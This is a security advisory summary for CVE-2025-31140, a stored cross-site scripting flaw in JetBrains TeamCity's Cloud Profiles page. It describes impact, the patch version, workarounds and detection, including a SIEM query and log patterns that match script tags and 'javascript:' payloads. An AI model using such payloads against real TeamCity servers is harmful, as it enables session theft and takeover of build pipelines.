CVE-2025-31140
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in JetBrains TeamCity allows attackers to inject malicious scripts into the Cloud Profiles page. When other users view the compromised page, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. All TeamCity instances running versions before 2025.03 are affected.
💻 Affected Systems
- JetBrains TeamCity
📦 What is this software?
Teamcity by Jetbrains
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to TeamCity, compromise build pipelines, and potentially access source code repositories and credentials stored in the CI/CD system.
Likely Case
Attackers with access to TeamCity could inject malicious scripts that steal session cookies from other users, leading to account takeover and unauthorized access to build configurations and artifacts.
If Mitigated
With proper input validation and output encoding, malicious scripts would be sanitized before execution, preventing successful exploitation.
🎯 Exploit Status
Exploitation requires authenticated access to TeamCity to inject malicious scripts into the Cloud Profiles page. The attack complexity is low once initial access is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2025.03
Vendor Advisory: https://www.jetbrains.com/privacy-security/issues-fixed/
Restart Required: Yes
Instructions:
1. Backup your TeamCity configuration and data. 2. Download TeamCity 2025.03 or later from the official JetBrains website. 3. Follow the TeamCity upgrade documentation for your specific deployment method (Windows installer, Docker, or manual installation). 4. Restart the TeamCity service after upgrade completion.
🔧 Temporary Workarounds
Disable Cloud Profiles Access
allTemporarily restrict or disable access to the Cloud Profiles page functionality until patching can be completed.
Configure TeamCity permissions to restrict access to Cloud Profiles functionality for non-administrative users
Implement WAF Rules
allDeploy web application firewall rules to detect and block XSS payloads targeting the Cloud Profiles endpoint.
Configure WAF to inspect requests to /app/rest/cloud/* endpoints for XSS patterns
🧯 If You Can't Patch
- Implement strict input validation and output encoding for all user-controllable data displayed on the Cloud Profiles page
- Enable Content Security Policy (CSP) headers to restrict script execution sources and mitigate XSS impact
🔍 How to Verify
Check if Vulnerable:
Check your TeamCity version in the Administration → Server Administration → Server Health page. If version is below 2025.03, you are vulnerable.Check Version:
For Linux: grep -i version /opt/teamcity/logs/teamcity-server.log | tail -1. For Windows: Check TeamCity → Help → About in the web interface.Verify Fix Applied:
After upgrading, verify the version shows 2025.03 or higher in the Server Health page and test that Cloud Profiles functionality works without allowing script injection.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to Cloud Profiles endpoints containing script tags or JavaScript code
- Multiple failed login attempts followed by successful access to Cloud Profiles functionality
Network Indicators:
- HTTP requests containing <script> tags or JavaScript event handlers (onload, onerror, etc.) sent to /app/rest/cloud/* endpoints
SIEM Query:
source="teamcity" AND (uri_path="/app/rest/cloud/*" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:"))